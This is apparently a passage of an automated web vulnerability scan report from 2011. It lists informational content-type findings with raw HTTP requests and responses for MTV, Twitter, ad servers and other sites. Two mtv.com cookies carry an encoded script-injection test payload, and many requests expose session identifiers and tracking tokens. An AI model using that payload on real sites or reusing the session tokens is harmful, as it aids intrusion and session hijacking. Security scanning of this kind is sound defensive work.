Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; /PC=0; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:15:07 GMT
Content-Length: 529
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /SO=:463:; path=/
Set-Cookie: /PC=1; path=/; expires=Tue, 21-Jun-2011 00:15:06 GMT
Set-Cookie: /SC=1-33A.1; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

document.write('<img src="http://b.scorecardresearch.com/b?C1=8
...[SNIP]...
27.24. http://www.livewithoscar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.2.10.1308052841

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:10 GMT
Content-Length: 370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<meta http-equiv="Content-Type" con
...[SNIP]...
27.25. http://www.livewithoscar.com/images/misc/calendar_impact_high.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /images/misc/calendar_impact_high.gif

Request

GET /images/misc/calendar_impact_high.gif HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.6.10.1308052841

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:12 GMT
Content-Length: 370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<meta http-equiv="Content-Type" con
...[SNIP]...
27.26. http://www.livewithoscar.com/images/misc/calendar_impact_low.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /images/misc/calendar_impact_low.gif

Request

GET /images/misc/calendar_impact_low.gif HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.6.10.1308052841

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:13 GMT
Content-Length: 370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<meta http-equiv="Content-Type" con
...[SNIP]...
27.27. http://www.livewithoscar.com/images/misc/calendar_impact_medium.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /images/misc/calendar_impact_medium.gif

Request

GET /images/misc/calendar_impact_medium.gif HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.6.10.1308052841

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:13 GMT
Content-Length: 370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<meta http-equiv="Content-Type" con
...[SNIP]...
27.28. http://www.livewithoscar.com/images/misc/nonec.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /images/misc/nonec.gif

Request

GET /images/misc/nonec.gif HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.6.10.1308052841

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:13 GMT
Content-Length: 370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<meta http-equiv="Content-Type" con
...[SNIP]...
27.29. http://www.mtv.com/games/arcade/game/play.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /games/arcade/game/play.jhtml

Request

GET /games/arcade/game/play.jhtml?arcadeGameId=10325912 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012600|check#true#1308010800; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: de3234c31aebd5a0514286e2152d9433
Vary: Accept-Encoding
Cache-Control: max-age=591
Date: Tue, 14 Jun 2011 00:19:23 GMT
Content-Length: 18059
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<l
...[SNIP]...
27.30. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/modules/followUs/js/home.jhtml

Request

GET /global/music/modules/followUs/js/home.jhtml HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; __cs_rr=1; ak-mobile-detected=no; mbox=check#true#1308010557|session#1308010496673-477284#1308012357

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: b24b5cf118bfa33f2a875526acc157fd
Last-Modified: Mon, 13 Jun 2011 23:53:07 GMT
Content-Type: text/html
Content-Length: 1326
Cache-Control: max-age=422
Date: Tue, 14 Jun 2011 00:14:59 GMT
Connection: close
Vary: Accept-Encoding

var documentBuffer = "<div class=\"mdl mdl_followUs\"><div class=\"h-wrap group\"><h2 class=\"h-sub2 group\"><span>Follow MTV</span></h2></div><ol class=\"lst photo-alt followUs followUsHome\"> <li st
...[SNIP]...
27.31. http://www.mtv.com/global/music/scripts/includes/geo.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/music/scripts/includes/geo.jhtml

Request

GET /global/music/scripts/includes/geo.jhtml HTTP/1.1
Host: www.mtv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: mtvn_guid=1307964874-137; __qca=P0-450113519-1307964874594; __cs_rr=1; s_ppv=26; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D858%253Bdemo%253D857%253Bdemo%253D856%253Bdemo%253D850%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775; s_cc=true; s_sq=viamtv%3D%2526pid%253Dhttp%25253A%25252F%25252Fhollywoodcrush.mtv.com%25252Ffavicon.ico4bc7e%2525253C%25252Fscript%2525253E%2525253Cscript%2525253Ealert(%25252522FAVICON%25252522)%2525253C%25252Fscript%2525253E4e5acb99ae0%2526oid%253Dhttp%25253A%25252F%25252Fwww.mtv.com%25252Fontv%25252F%2526ot%253DA; ak-mobile-detected=no

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 537
Content-Type: text/html
ETag: cbe91df699c45787d2fcbbfd68fd5d6
Vary: Accept-Encoding
MTVi-Edge-control: bust-downstream
Date: Mon, 13 Jun 2011 17:45:29 GMT
Connection: close
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:03 GMT


function InitCurrentTime() {

this.now = "201106131345";

this.rawTime = this.now;

if(this.now.indexOf("esi") > -1) {this.now = "201001111742"; }//var this.now = "01-11-2010 17:59";

...[SNIP]...
27.32. http://www.mtv.com/global/scripts/special/projx.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /global/scripts/special/projx.jhtml

Request

GET /global/scripts/special/projx.jhtml?channelname=MTV HTTP/1.1
Host: www.mtv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: mtvn_guid=1307964874-137; __qca=P0-450113519-1307964874594; __cs_rr=1; s_ppv=26; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D858%253Bdemo%253D857%253Bdemo%253D856%253Bdemo%253D850%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775; s_cc=true; s_sq=viamtv%3D%2526pid%253Dhttp%25253A%25252F%25252Fhollywoodcrush.mtv.com%25252Ffavicon.ico4bc7e%2525253C%25252Fscript%2525253E%2525253Cscript%2525253Ealert(%25252522FAVICON%25252522)%2525253C%25252Fscript%2525253E4e5acb99ae0%2526oid%253Dhttp%25253A%25252F%25252Fwww.mtv.com%25252Fontv%25252F%2526ot%253DA; ak-mobile-detected=no; mbox=check#true#1307987191|session#1307987130821-992336#1307988991

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: 5bd85b90fbc2c4e8961664fffa70d691
Vary: Accept-Encoding
Cache-Control: max-age=2416
Date: Mon, 13 Jun 2011 17:45:34 GMT
Content-Length: 10009
Connection: close

var projX = {};

projX.repeat = false;
projX.test = false;

projX.displayEventPre = function(){ return true;};
projX.displayEventPost = function(){};
projX.closeEvent = function(){};

projX.layerindex
...[SNIP]...
27.33. http://www.mtv.com/xd_flux.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /xd_flux.html

Request

GET /xd_flux.html?callbackName=F13080112111260&args=setheight:453 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 08 Feb 2010 20:27:03 GMT
ETag: "4011b79-17d-47f1c9fc2d3c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 381
Cache-Control: max-age=1800
Date: Tue, 14 Jun 2011 00:27:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain F
...[SNIP]...
27.34. http://www.pega.com/welcome-info-ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pega.com
Path:   /welcome-info-ajax.php

Request

GET /welcome-info-ajax.php HTTP/1.1
Host: www.pega.com
Proxy-Connection: keep-alive
Referer: http://www.pega.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-AH-Environment: prod
Vary: Accept-Encoding
Content-Length: 31
Date: Tue, 14 Jun 2011 12:27:58 GMT
X-Varnish: 238918922 238862776
Age: 252
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
X-Cache-Hits: 12

<a href="/user">Sign In</a>

28. Content type incorrectly stated  previous  next
There are 33 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

28.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4dce55b134194; expires=Thu, 14-Jul-2011 14:11:25 GMT; path=/
Set-Cookie: i_1=46:1354:269:44:0:44390:1307974285:B2|46:1354:804:44:0:44390:1307974284:B2|46:1354:804:44:0:44377:1307970673:B2; expires=Thu, 14-Jul-2011 14:11:25 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 743

   function wsod_image1354() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdC
...[SNIP]...
28.2. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/dallasmavs/lists/mavs-insiders/statuses.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/dallasmavs/lists/mavs-insiders/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=80276618140057601&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1307974549297=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; guest_id=130796296639680752; original_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; external_referer=Bm9gjDJKLkNUA6KUQhqcUTdiRGCASXVaz08YGXkOHWMzPBOM8BKQu4ZyXL5mG7%2BW%7C0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:18:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1307974730-27498-54875
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 14:18:50 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.02090
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1145421744e
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 15b53af3a80af8b4797dfcbedd54f4e0e1b06d64
X-RateLimit-Reset: 1307978149
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);
28.3. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/fansided/lists/fansided-nba/statuses.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/fansided/lists/fansided-nba/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=80236513723559936&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1307970834445=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; guest_id=130796296639680752; original_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; external_referer=Bm9gjDJKLkNUA6KUQhqcUTdiRGCASXVaz08YGXkOHWMzPBOM8BKQu4ZyXL5mG7%2BW%7C0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:40:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1307972408-71877-6206
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 13 Jun 2011 13:40:08 GMT
X-RateLimit-Remaining: 24
X-Runtime: 0.02304
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1145421744e
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 32703bb2f79b3eb645cd9ae1f21c791d766d77fa
X-RateLimit-Reset: 1307974404
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);
28.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2713133&PluID=0&e=0&w=300&h=250&ord=3138287&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a/i%3B239895957%3B0-0%3B0%3B15527176%3B4307-300/250%3B42522129/42539916/1%3B%3B%7Eokv%3D%3B%3Bs%3D8_10001%3Bmc%3Db2pfreezone%3Btile%3D6%3Bsz%3D336x280%2C300x250%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
